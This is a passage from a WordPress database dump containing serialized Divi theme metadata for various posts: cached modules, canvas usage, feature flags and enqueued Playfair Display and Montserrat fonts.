d-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32179,1591,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32175,710,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32171,791,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32172,710,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32173,710,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32174,710,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32167,1190,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32168,791,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32169,791,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32170,791,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32160,609,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32161,609,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32162,609,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32163,609,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32164,1190,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32165,1190,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32166,1190,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32155,871,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32156,677,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32157,677,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32158,677,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32159,677,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32151,1102,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32152,871,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32153,871,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32154,871,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32148,1102,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32149,1102,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32150,1102,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32139,809,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32140,680,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32141,680,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32142,680,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32143,680,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32144,1603,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32145,1603,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32146,1603,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32147,1603,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32131,1653,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32132,599,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32133,599,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32134,599,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32135,599,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32136,809,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32137,809,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32138,809,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32120,796,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32121,796,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32122,796,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32123,796,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32124,645,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32125,645,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32126,645,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a: